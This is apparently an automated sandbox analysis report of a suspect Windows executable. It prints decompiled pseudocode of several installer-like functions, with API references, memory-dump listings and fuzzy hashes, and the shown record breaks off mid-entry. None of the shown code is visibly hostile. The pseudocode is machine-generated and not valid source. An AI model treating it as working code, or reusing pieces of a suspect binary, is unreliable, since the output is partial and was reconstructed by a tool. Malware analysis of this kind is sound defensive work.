                                                                                                        			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029F6(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x409010, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E00405AC4(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E00405AC4(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}






                                                                                                        0x00401ec7
                                                                                                        0x00401ecf
                                                                                                        0x00401ed4
                                                                                                        0x00401ed9
                                                                                                        0x00401edd
                                                                                                        0x00401ee0
                                                                                                        0x00401ee2
                                                                                                        0x00401ee9
                                                                                                        0x00401ef2
                                                                                                        0x00401efa
                                                                                                        0x00401efd
                                                                                                        0x00401f12
                                                                                                        0x00401f18
                                                                                                        0x00401f2b
                                                                                                        0x00401f34
                                                                                                        0x00401f40
                                                                                                        0x00401f45
                                                                                                        0x00401f45
                                                                                                        0x00401f2b
                                                                                                        0x00401f48
                                                                                                        0x00401b75
                                                                                                        0x00401b75
                                                                                                        0x00401efd
                                                                                                        0x0040288e
                                                                                                        0x0040289a

                                                                                                        APIs
                                                                                                        • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                                                                                                        • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                                                                                                        • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401F24
                                                                                                          • Part of subcall function 00405AC4: wsprintfA.USER32 ref: 00405AD1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 1404258612-0
                                                                                                        • Opcode ID: be50ba22476c795dccddfbd46c0b19e6aec7ed87346bdfd2eed6167faf837e67
                                                                                                        • Instruction ID: 178fa6cf4330108057832d0c189c0e5a27020503733a18e797ef1cc5e9d7aef6
                                                                                                        • Opcode Fuzzy Hash: be50ba22476c795dccddfbd46c0b19e6aec7ed87346bdfd2eed6167faf837e67
                                                                                                        • Instruction Fuzzy Hash: 52113A71A00108BEDB01EFA5DD819AEBBB9EB48344B20853AF501F61E1D7389A54DB28
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401D1B, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 67%
                                                                                                        			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af74->lfHeight =  ~(MulDiv(E004029D9(2), _t6, 0x48));
				 *0x40af84 = E004029D9(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af8b = 1;
				 *0x40af88 = _t11 & 0x00000001;
				 *0x40af89 = _t11 & 0x00000002;
				 *0x40af8a = _t11 & 0x00000004;
				E00405B88(_t18, _t24, _t26, 0x40af90,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af74);
				_push(_t14);
				_push(_t26);
				E00405AC4();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                                                                                        0x00401d29
                                                                                                        0x00401d42
                                                                                                        0x00401d4c
                                                                                                        0x00401d51
                                                                                                        0x00401d5c
                                                                                                        0x00401d63
                                                                                                        0x00401d75
                                                                                                        0x00401d7b
                                                                                                        0x00401d80
                                                                                                        0x00401d8a
                                                                                                        0x004024b8
                                                                                                        0x00401561
                                                                                                        0x00402833
                                                                                                        0x0040288e
                                                                                                        0x0040289a

                                                                                                        APIs
                                                                                                        • GetDC.USER32(?), ref: 00401D22
                                                                                                        • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                                                                                                        • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                                                                                                        • CreateFontIndirectA.GDI32(0040AF74), ref: 00401D8A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CapsCreateDeviceFontIndirect
                                                                                                        • String ID:
                                                                                                        • API String ID: 3272661963-0
                                                                                                        • Opcode ID: 2c6a9fd6684e48c72e8170f31dde3613139c4976fc228405473ba1f45ca6ba00
                                                                                                        • Instruction ID: d83410998d1654a5337f8c322709d39cf2ce3a8a4f0330bc6585c9693e616625
                                                                                                        • Opcode Fuzzy Hash: 2c6a9fd6684e48c72e8170f31dde3613139c4976fc228405473ba1f45ca6ba00
                                                                                                        • Instruction Fuzzy Hash: E1F044F1A45342AEE7016770AE0ABA93B649725306F100576F541BA1E2C5BC10149B7F
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00403978, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00403978(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405ADD(__ecx, "1033");
				while(1) {
					_t26 =  *0x423ee4;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x423eb0 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423ee0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423680 = _t18[1];
					 *0x423f48 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42367c = _t23;
						E00405AC4(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420478, E00405B88(_t13, _t24, _t26, 0x4236a0, 0xfffffffe));
						_t11 =  *0x423ecc;
						_t27 =  *0x423ec8;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00405B88(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}
















                                                                                                        0x0040397c
                                                                                                        0x00403981
                                                                                                        0x00403987
                                                                                                        0x0040398c
                                                                                                        0x0040398c
                                                                                                        0x00403994
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040399c
                                                                                                        0x004039a4
                                                                                                        0x004039a6
                                                                                                        0x004039ac
                                                                                                        0x004039ac
                                                                                                        0x004039ae
                                                                                                        0x004039ba
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004039be
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004039c0
                                                                                                        0x004039c5
                                                                                                        0x004039ce
                                                                                                        0x004039d4
                                                                                                        0x004039d9
                                                                                                        0x004039ed
                                                                                                        0x004039f8
                                                                                                        0x00403a10
                                                                                                        0x00403a16
                                                                                                        0x00403a1b
                                                                                                        0x00403a23
                                                                                                        0x00403a44
                                                                                                        0x00403a44
                                                                                                        0x00403a44
                                                                                                        0x00403a25
                                                                                                        0x00403a27
                                                                                                        0x00403a27
                                                                                                        0x00403a2b
                                                                                                        0x00403a32
                                                                                                        0x00403a32
                                                                                                        0x00403a37
                                                                                                        0x00403a3d
                                                                                                        0x00403a3d
                                                                                                        0x00000000
                                                                                                        0x00403a27
                                                                                                        0x004039db
                                                                                                        0x004039e0
                                                                                                        0x004039e9
                                                                                                        0x004039e2
                                                                                                        0x004039e2
                                                                                                        0x004039e2
                                                                                                        0x004039e0

                                                                                                        APIs
                                                                                                        • SetWindowTextA.USER32(00000000,004236A0), ref: 00403A10
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: TextWindow
                                                                                                        • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                        • API String ID: 530164218-1075807775
                                                                                                        • Opcode ID: defed7287a9455a29b24b67e45bb8aa9d1031aed7a359321573c6b72916d69ed
                                                                                                        • Instruction ID: 09623374405f0611f065d620c03919b516a5f167df25bc0d5edc66fe9dc562c0
                                                                                                        • Opcode Fuzzy Hash: defed7287a9455a29b24b67e45bb8aa9d1031aed7a359321573c6b72916d69ed
                                                                                                        • Instruction Fuzzy Hash: F611C2B1B005109BC730DF15D880A73767DEB84716369413BE94167391C77EAE028E58
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00404E54, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00404E54(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420488 != _t22) {
							 *0x420488 = _t22;
							E00405B66(0x4204a0, 0x424000);
							E00405AC4(0x424000, _t22);
							E0040140B(6);
							E00405B66(0x424000, 0x4204a0);
						}
						L11:
						return CallWindowProcA( *0x420490, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E004047D3(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403F64(0x413);
				return 0;
			}




                                                                                                        0x00404e60
                                                                                                        0x00404e85
                                                                                                        0x00404ea5
                                                                                                        0x00404ea8
                                                                                                        0x00404eab
                                                                                                        0x00404ec2
                                                                                                        0x00404ec8
                                                                                                        0x00404ecf
                                                                                                        0x00404ed6
                                                                                                        0x00404edd
                                                                                                        0x00404ee2
                                                                                                        0x00404ee8
                                                                                                        0x00000000
                                                                                                        0x00404ef8
                                                                                                        0x00404e92
                                                                                                        0x00404ee5
                                                                                                        0x00404ee5
                                                                                                        0x00000000
                                                                                                        0x00404ee5
                                                                                                        0x00404e9e
                                                                                                        0x00404ea0
                                                                                                        0x00000000
                                                                                                        0x00404ea0
                                                                                                        0x00404e66
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404e6d
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • IsWindowVisible.USER32(?), ref: 00404E8A
                                                                                                        • CallWindowProcA.USER32 ref: 00404EF8
                                                                                                          • Part of subcall function 00403F64: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403F76
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                                        • String ID:
                                                                                                        • API String ID: 3748168415-3916222277
                                                                                                        • Opcode ID: 1a28ca64547386e1a64dd11c64f6ae458e1df03769ff3acb3952d776ac0a4b66
                                                                                                        • Instruction ID: 62f3a1a08e098275047049d4f9968a6b4933f6b7f921e7009373277d82a30415
                                                                                                        • Opcode Fuzzy Hash: 1a28ca64547386e1a64dd11c64f6ae458e1df03769ff3acb3952d776ac0a4b66
                                                                                                        • Instruction Fuzzy Hash: D1116D71900208BBDB21AF52DC4499B3669FB84369F00803BF6047A2E2C37C5A519BAD
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004024BE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E004024BE(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E004029F6(0x11));
				} else {
					E004029D9(1);
					 *0x409f70 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405ADD(_t17 + 8, _t15), "C:\Users\hardz\AppData\Local\Temp\nssF140.tmp\System.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                                                                                        0x004024be
                                                                                                        0x004024be
                                                                                                        0x004024c1
                                                                                                        0x004024dc
                                                                                                        0x004024c3
                                                                                                        0x004024c5
                                                                                                        0x004024ca
                                                                                                        0x004024d1
                                                                                                        0x004024e3
                                                                                                        0x0040265c
                                                                                                        0x0040265c
                                                                                                        0x004024e9
                                                                                                        0x004024fb
                                                                                                        0x004015a6
                                                                                                        0x004015a8
                                                                                                        0x00000000
                                                                                                        0x004015ae
                                                                                                        0x004015a8
                                                                                                        0x0040288e
                                                                                                        0x0040289a

                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32(00000000,00000011), ref: 004024DC
                                                                                                        • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nssF140.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 004024FB
                                                                                                        Strings
                                                                                                        • C:\Users\user\AppData\Local\Temp\nssF140.tmp\System.dll, xrefs: 004024CA, 004024EF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: FileWritelstrlen
                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nssF140.tmp\System.dll
                                                                                                        • API String ID: 427699356-2393677520
                                                                                                        • Opcode ID: 02a15bd42c28bed1fb8554f3d16374f042fc662dbffd218bbabce7ee12e12458
                                                                                                        • Instruction ID: 2c1f07a632d72534084a5ac00d75746702f795d1104bf50e8da4b719a2e94720
                                                                                                        • Opcode Fuzzy Hash: 02a15bd42c28bed1fb8554f3d16374f042fc662dbffd218bbabce7ee12e12458
                                                                                                        • Instruction Fuzzy Hash: BCF08972A44245FFD710EBB19E49EAF7668DB00348F14443BB142F51C2D6FC5982976D
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040361A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E0040361A() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41f45c;
				_t3 = E004035FF(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41f45c =  *0x41f45c & 0x00000000;
				return _t3;
			}







                                                                                                        0x0040361b
                                                                                                        0x00403623
                                                                                                        0x0040362a
                                                                                                        0x0040362d
                                                                                                        0x0040362d
                                                                                                        0x0040362f
                                                                                                        0x00403634
                                                                                                        0x0040363b
                                                                                                        0x00403641
                                                                                                        0x00403645
                                                                                                        0x00403646
                                                                                                        0x0040364e

                                                                                                        APIs
                                                                                                        • FreeLibrary.KERNEL32(?,"C:\Users\user\Desktop\KY4cmAI0jU.exe" ,00000000,74B5F560,004035F1,00000000,0040342D,00000000), ref: 00403634
                                                                                                        • GlobalFree.KERNEL32 ref: 0040363B
                                                                                                        Strings
                                                                                                        • "C:\Users\user\Desktop\KY4cmAI0jU.exe" , xrefs: 0040362C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Free$GlobalLibrary
                                                                                                        • String ID: "C:\Users\user\Desktop\KY4cmAI0jU.exe"
                                                                                                        • API String ID: 1100898210-1251433773
                                                                                                        • Opcode ID: 594683390acbace1feb38ee5af495b240e475f157c4d409b541952378f73dbd9
                                                                                                        • Instruction ID: 07f203a12dc211ea1540440f4769086933c1ddaa55d0411da1bb29b7fd771b51
                                                                                                        • Opcode Fuzzy Hash: 594683390acbace1feb38ee5af495b240e475f157c4d409b541952378f73dbd9
                                                                                                        • Instruction Fuzzy Hash: 8FE08C32804420ABC6216F55EC0579A7768AB48B22F028536E900BB3A083743C464BDC
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004056A0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E004056A0(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                                                                        0x004056a1
                                                                                                        0x004056ab
                                                                                                        0x004056ad
                                                                                                        0x004056b4
                                                                                                        0x004056bc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004056bc
                                                                                                        0x004056be
                                                                                                        0x004056c3

                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CDE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\KY4cmAI0jU.exe,C:\Users\user\Desktop\KY4cmAI0jU.exe,80000000,00000003), ref: 004056A6
                                                                                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CDE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\KY4cmAI0jU.exe,C:\Users\user\Desktop\KY4cmAI0jU.exe,80000000,00000003), ref: 004056B4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CharPrevlstrlen
                                                                                                        • String ID: C:\Users\user\Desktop
                                                                                                        • API String ID: 2709904686-1669384263
                                                                                                        • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                                        • Instruction ID: 6658d1b0ab05e5211e75f0b74aef41c49d7b43cb9628f8e009f88ad9fa15a52a
                                                                                                        • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                                        • Instruction Fuzzy Hash: C5D0A772409DB02EF30352108C04B8F7A98CF17300F0948A2E440E21D0C27C5C818FFD
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 737510E0, Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E737510E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _t17;
				char _t19;
				void* _t20;
				void* _t24;
				void* _t27;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				signed int _t43;
				void* _t52;
				char* _t53;
				char* _t55;
				void* _t56;
				void* _t58;

				 *0x7375405c = _a8;
				 *0x73754060 = _a16;
				 *0x73754064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x73754038, E73751556, _t52);
				_t43 =  *0x7375405c +  *0x7375405c * 4 << 2;
				_t17 = E7375123B();
				_a8 = _t17;
				_t53 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_a8);
				} else {
					do {
						_t19 =  *_t53;
						_t55 = _t53 + 1;
						_t58 = _t19 - 0x6c;
						if(_t58 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t53 = _t55 + 1;
								_t24 = E73751266(E737512AD( *_t55 - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t27 = _t20;
							if(_t27 == 0) {
								L10:
								_t53 = _t55 + 1;
								_t24 = E737512D1( *_t55 - 0x30, E7375123B());
								goto L13;
							}
							L7:
							if(_t27 == 1) {
								_t31 = GlobalAlloc(0x40, _t43 + 4);
								 *_t31 =  *0x73754030;
								 *0x73754030 = _t31;
								E73751508(_t31 + 4,  *0x73754064, _t43);
								_t56 = _t56 + 0xc;
							}
							goto L14;
						}
						if(_t58 == 0) {
							L17:
							_t34 =  *0x73754030;
							if( *0x73754030 != 0) {
								E73751508( *0x73754064, _t34 + 4, _t43);
								_t37 =  *0x73754030;
								_t56 = _t56 + 0xc;
								GlobalFree(_t37);
								 *0x73754030 =  *_t37;
							}
							goto L14;
						}
						_t39 = _t19 - 0x4c;
						if(_t39 == 0) {
							goto L17;
						}
						_t40 = _t39 - 4;
						if(_t40 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L12;
						}
						_t27 = _t40;
						if(_t27 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t53 != 0);
					goto L16;
				}
			}


















                                                                                                        0x737510e7
                                                                                                        0x737510ef
                                                                                                        0x73751103
                                                                                                        0x7375110b
                                                                                                        0x73751116
                                                                                                        0x73751119
                                                                                                        0x73751121
                                                                                                        0x73751124
                                                                                                        0x73751126
                                                                                                        0x737511c4
                                                                                                        0x737511d0
                                                                                                        0x7375112c
                                                                                                        0x7375112d
                                                                                                        0x7375112d
                                                                                                        0x73751130
                                                                                                        0x73751131
                                                                                                        0x73751134
                                                                                                        0x73751203
                                                                                                        0x73751206
                                                                                                        0x7375119e
                                                                                                        0x737511a4
                                                                                                        0x737511ac
                                                                                                        0x737511b1
                                                                                                        0x737511b4
                                                                                                        0x00000000
                                                                                                        0x737511b4
                                                                                                        0x73751209
                                                                                                        0x7375120a
                                                                                                        0x73751186
                                                                                                        0x7375118c
                                                                                                        0x73751194
                                                                                                        0x00000000
                                                                                                        0x73751194
                                                                                                        0x73751152
                                                                                                        0x73751153
                                                                                                        0x7375115b
                                                                                                        0x73751168
                                                                                                        0x73751170
                                                                                                        0x73751179
                                                                                                        0x7375117e
                                                                                                        0x7375117e
                                                                                                        0x00000000
                                                                                                        0x73751153
                                                                                                        0x7375113a
                                                                                                        0x737511d1
                                                                                                        0x737511d1
                                                                                                        0x737511d8
                                                                                                        0x737511e5
                                                                                                        0x737511ea
                                                                                                        0x737511ef
                                                                                                        0x737511f5
                                                                                                        0x737511fb
                                                                                                        0x737511fb
                                                                                                        0x00000000
                                                                                                        0x737511d8
                                                                                                        0x73751140
                                                                                                        0x73751143
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x73751149
                                                                                                        0x7375114c
                                                                                                        0x7375119b
                                                                                                        0x00000000
                                                                                                        0x7375119b
                                                                                                        0x7375114f
                                                                                                        0x73751150
                                                                                                        0x73751183
                                                                                                        0x00000000
                                                                                                        0x73751183
                                                                                                        0x00000000
                                                                                                        0x737511ba
                                                                                                        0x737511ba
                                                                                                        0x00000000
                                                                                                        0x737511c3

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.219980840.0000000073751000.00000020.00020000.sdmp, Offset: 73750000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.219965767.0000000073750000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.220004085.0000000073753000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.220020460.0000000073755000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Global$Free$Alloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 1780285237-0
                                                                                                        • Opcode ID: 221320d8b9f422cf1b650d6a96f7e4081ca984872c3473ba484b355ca850635f
                                                                                                        • Instruction ID: f5ba27d3f3908965827867e7f19bc1e4d3a10e20e1b0676ee232685623ded063
